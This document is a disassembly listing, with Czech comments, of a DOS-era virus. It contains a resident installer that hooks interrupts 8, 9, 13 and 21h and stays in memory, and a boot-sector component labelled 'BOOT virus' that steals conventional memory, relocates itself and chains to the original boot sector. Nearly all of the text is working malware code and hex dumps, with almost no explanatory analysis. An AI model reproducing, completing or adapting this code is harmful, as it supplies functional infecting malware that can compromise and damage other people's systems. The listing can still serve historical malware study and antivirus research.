0BDE 33F6 XOR SI,SI 0BE0 8BFE MOV DI,SI 0BE2 06 PUSH ES 0BE3 B8EC0B MOV AX,0BEC 0BE6 50 PUSH AX 0BE7 EAF0030000 JMP 0000:03F0 AX=0BEC BX=0E1A CX=0800 DX=2D4C SP=0DEA BP=0000 SI=0000 DI=0000 DS= CS ES= CS SS= CS CS= CS IP=0BE7 NV UP EI PL ZR NA PE NC ;--------------------------------------------------------------------- 0BEC 8CC8 MOV AX,CS 0BEE 8ED0 MOV SS,AX 0BF0 BCEE0D MOV SP,0DEE 0BF3 33C0 XOR AX,AX 0BF5 8ED8 MOV DS,AX 0BF7 2EA11800 MOV AX,CS:[0018] 0BFB A3F003 MOV [03F0],AX 0BFE 2EA01A00 MOV AL,CS:[001A] 0C02 A2F203 MOV [03F2],AL 0C05 BB0010 MOV BX,1000 0C08 B104 MOV CL,04 0C0A D3EB SHR BX,CL 0C0C 83C340 ADD BX,+40 0C0F B44A MOV AH,4A ; modifikuj alokovanou pamet 0C11 2E8E061600 MOV ES,CS:[0016] 0C16 CD21 INT 21 0C18 B82135 MOV AX,3521 0C1B CD21 INT 21 0C1D 2E891EC506 MOV CS:[06C5],BX 0C22 2E8C06C706 MOV CS:[06C7],ES 0C27 0E PUSH CS 0C28 1F POP DS 0C29 BA9A06 MOV DX,069A 0C2C B82125 MOV AX,2521 0C2F CD21 INT 21 0C31 8E061600 MOV ES,[0016] 0C35 268E062C00 MOV ES,ES:[002C] 0C3A 33FF XOR DI,DI 0C3C B9FF7F MOV CX,7FFF 0C3F 32C0 XOR AL,AL 0C41 F2AE REPNZ SCASB 0C43 263805 CMP ES:[DI],AL 0C46 E0F9 LOOPNZ 0C41 0C48 8BD7 MOV DX,DI 0C4A 83C203 ADD DX,+03 0C4D B8004B MOV AX,4B00 0C50 06 PUSH ES 0C51 1F POP DS 0C52 0E PUSH CS 0C53 07 POP ES 0C54 BB7000 MOV BX,0070 0C57 1E PUSH DS 0C58 06 PUSH ES 0C59 50 PUSH AX 0C5A 53 PUSH BX 0C5B 51 PUSH CX 0C5C 52 PUSH DX 0C5D 0E PUSH CS 0C5E 1F POP DS 0C5F B80835 MOV AX,3508 0C62 CD21 INT 21 0C64 891ED902 MOV [02D9],BX 0C68 8C06DB02 MOV [02DB],ES 0C6C BAB302 MOV DX,02B3 0C6F B80825 MOV AX,2508 0C72 CD21 INT 21 0C74 B80935 MOV AX,3509 0C77 CD21 INT 21 0C79 891EBA03 MOV [03BA],BX 0C7D 8C06BC03 MOV [03BC],ES 0C81 BA7303 MOV DX,0373 0C84 B80925 MOV AX,2509 0C87 CD21 INT 21 0C89 B81335 MOV AX,3513 0C8C CD21 INT 21 0C8E 891E3406 MOV [0634],BX 0C92 8C063606 MOV [0636],ES 0C96 BAF004 MOV DX,04F0 0C99 B81325 MOV AX,2513 0C9C CD21 INT 21 0C9E 5A POP DX 0C9F 59 POP CX 0CA0 5B POP BX 0CA1 58 POP AX 0CA2 07 POP ES 0CA3 1F POP DS 0CA4 9C PUSHF 0CA5 2EFF1EC506 CALL FAR CS:[06C5] 0CAA 1E PUSH DS 0CAB 07 POP ES 0CAC B449 MOV AH,49 0CAE CD21 INT 21 0CB0 B44D MOV AH,4D 0CB2 CD21 INT 21 0CB4 B431 MOV AH,31 0CB6 BA0010 MOV DX,1000 0CB9 B104 MOV CL,04 0CBB D3EA SHR DX,CL 0CBD 83C240 ADD DX,+40 0CC0 CD21 INT 21 0CC0 00 00 00 00 00 00-00 00 00 00 00 00 00 00 0CD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 . . . 0DB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 0DC0 00 00 00 00 00 00 F0 0C-FF 48 C5 48 57 18 06 00 ......p..HEHW... 0DD0 C5 48 00 00 00 00 C5 48-D5 48 00 00 EC 0B 59 09 EH....EHUH..l.Y. 0DE0 EC 0B 00 00 EC 0B 00 00-EC 0B D5 48 C0 3F 40 00 l...l...l.UH@?@. 0DF0 F5 19 73 0A F5 19 46 02-22 15 EC 0B 32 15 00 00 u.s.u.F.".l.2... ;=========================================================================== ; BOOT virus ; 0000 E99C00 JMP 009F 0000 E9 9C 00 4D 53 44 4F 53-34 2E 30 00 02 01 01 00 i..MSDOS4.0..... 0010 02 E0 00 40 0B F0 09 00-12 00 02 00 00 00 00 00 .`.@.p.......... 0020 00 00 00 00 00 00 29 DC-49 4F 20 20 20 20 20 20 ......)\IO 0030 53 59 53 4D 53 44 4F 53-20 20 20 53 59 53 CB 3C SYSMSDOS SYSK< 0040 FE FF FE FF 07 00 80 00-4E 6F 6E 2D 73 79 73 74 ~.~.....Non-syst 0050 65 6D 20 64 69 73 6B 20-6F 72 20 64 69 73 6B 20 em disk or disk 0060 65 72 72 6F 72 2E 0A 0D-52 65 70 6C 61 63 65 20 error...Replace 0070 61 6E 64 20 73 74 72 69-6B 65 20 61 6E 79 20 6B and strike any k 0080 65 79 20 77 68 65 6E 20-72 65 61 64 79 44 69 73 ey when readyDis 0090 6B 20 62 6F 6F 74 20 66-61 69 6C 75 72 65 2E k boot failure. 009F B8006E MOV AX,6E00 00A2 B104 MOV CL,04 00A4 D3E8 SHR AX,CL 00A6 8CC9 MOV CX,CS 00A8 03C1 ADD AX,CX 00AA 8ED8 MOV DS,AX 00AC 8EC0 MOV ES,AX 00AE 8ED1 MOV SS,CX 00B0 BCF0FF MOV SP,FFF0 00B3 1E PUSH DS 00B4 B8B90E MOV AX,0EB9 00B7 50 PUSH AX 00B8 CB RETF ;======================================================================= ; pokracovani po RETF - kod souvisly, zmena CS ; 0EB9 8816460E MOV [0E46],DL 0EBD 33C0 XOR AX,AX 0EBF 8ED8 MOV DS,AX 0EC1 A11304 MOV AX,[0413] ; velikost pameti v kB 0EC4 B106 MOV CL,06 0EC6 D3E0 SHL AX,CL 0EC8 8ED8 MOV DS,AX ; prepocet na paragrafy 0ECA 833E400EFE CMP Word Ptr [0E40],-02 0ECF 751A JNZ 0EEB 0ED1 B8520F MOV AX,0F52 0ED4 1E PUSH DS 0ED5 50 PUSH AX 0ED6 1E PUSH DS 0ED7 07 POP ES 0ED8 BF000E MOV DI,0E00 0EDB 33C0 XOR AX,AX 0EDD 8ED8 MOV DS,AX 0EDF BE007C MOV SI,7C00 0EE2 B94000 MOV CX,0040 0EE5 FA CLI 0EE6 FC CLD 0EE7 F3A4 REPZ MOVSB 0EE9 FB STI 0EEA CB RETF 0EEB 33C0 XOR AX,AX 0EED 8ED8 MOV DS,AX 0EEF A11304 MOV AX,[0413] 0EF2 2D0500 SUB AX,0005 0EF5 A31304 MOV [0413],AX 0EF8 B106 MOV CL,06 0EFA D3E0 SHL AX,CL 0EFC 8ED8 MOV DS,AX 0EFE 8EC0 MOV ES,AX 0F00 2E8B16460E MOV DX,CS:[0E46] 0F05 33DB XOR BX,BX 0F07 2E8B0E440E MOV CX,CS:[0E44] 0F0C B80802 MOV AX,0208 0F0F E8C800 CALL 0FDA 0F12 1E PUSH DS 0F13 B8180F MOV AX,0F18 0F16 50 PUSH AX 0F17 CB RETF 0F18 8816460E MOV [0E46],DL 0F1C 33C0 XOR AX,AX 0F1E 8ED8 MOV DS,AX 0F20 0E PUSH CS 0F21 07 POP ES 0F22 E839FB CALL 0A5E 0F25 2EC606740F00 MOV Byte Ptr CS:[0F74],00 0F2B 90 NOP 0F2C 8CC9 MOV CX,CS 0F2E BFD902 MOV DI,02D9 ; definice preruseni 8 0F31 BE2000 MOV SI,0020 0F34 BA750F MOV DX,0F75 0F37 E88500 CALL 0FBF 0F3A BE2400 MOV SI,0024 ; definice preruseni 9 0F3D BFBA03 MOV DI,03BA 0F40 BA7303 MOV DX,0373 0F43 E87900 CALL 0FBF 0F46 BE4C00 MOV SI,004C ; definice preruseni 13 0F49 BF3406 MOV DI,0634 0F4C BAF004 MOV DX,04F0 0F4F E86D00 CALL 0FBF 0F52 1E PUSH DS 0F53 07 POP ES 0F54 C7068400FFFF MOV Word Ptr [0084],FFFF 0F5A BB007C MOV BX,7C00 0F5D 2E8B0E440E MOV CX,CS:[0E44] 0F62 80C108 ADD CL,08 0F65 2E8B16460E MOV DX,CS:[0E46] 0F6A B80102 MOV AX,0201 0F6D E86A00 CALL 0FDA 0F70 1E PUSH DS 0F71 53 PUSH BX 0F72 CB RETF 0F73 00 01 0F75 FA CLI 0F76 2E803E740F00 CMP Byte Ptr CS:[0F74],00 0F7C 7404 JZ 0F82 0F7E E932F3 JMP 02B3 0F82 1E PUSH DS 0F83 06 PUSH ES 0F84 50 PUSH AX 0F85 53 PUSH BX 0F86 51 PUSH CX 0F87 52 PUSH DX 0F88 56 PUSH SI 0F89 57 PUSH DI 0F8A 33C0 XOR AX,AX 0F8C 8ED8 MOV DS,AX 0F8E A18400 MOV AX,[0084] 0F91 3DFFFF CMP AX,FFFF 0F94 741E JZ 0FB4 0F96 2E8006730F02 ADD Byte Ptr CS:[0F73],02 0F9C 7316 JNB 0FB4 0F9E 2EC606740F01 MOV Byte Ptr CS:[0F74],01 0FA4 0E PUSH CS 0FA5 07 POP ES 0FA6 BE8400 MOV SI,0084 0FA9 BFC506 MOV DI,06C5 0FAC 8CC9 MOV CX,CS 0FAE BA9A06 MOV DX,069A 0FB1 E80B00 CALL 0FBF 0FB4 5F POP DI 0FB5 5E POP SI 0FB6 5A POP DX 0FB7 59 POP CX 0FB8 5B POP BX 0FB9 58 POP AX 0FBA 07 POP ES 0FBB 1F POP DS 0FBC E919F3 JMP 02D8 0FBF 1E PUSH DS 0FC0 50 PUSH AX 0FC1 33C0 XOR AX,AX 0FC3 8ED8 MOV DS,AX 0FC5 58 POP AX 0FC6 51 PUSH CX 0FC7 FC CLD 0FC8 B90200 MOV CX,0002 0FCB F3A5 REPZ MOVSW 0FCD 59 POP CX 0FCE 83EE04 SUB SI,+04 0FD1 FA CLI 0FD2 8914 MOV [SI],DX 0FD4 894C02 MOV [SI+02],CX 0FD7 FB STI 0FD8 1F POP DS 0FD9 C3 RET 0FDA 56 PUSH SI 0FDB 8BF0 MOV SI,AX 0FDD CD13 INT 13 0FDF 7308 JNB 0FE9 0FE1 B400 MOV AH,00 0FE3 CD13 INT 13 0FE5 8BC6 MOV AX,SI 0FE7 EBF4 JMP 0FDD 0FE9 5E POP SI 0FEA C3 RET 0FE0 08 B4 00 CD 13 8B C6 EB-F4 5E C3 00 00 00 00 00 .4.M..Fkt^C..... 0FF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 AA ..............U*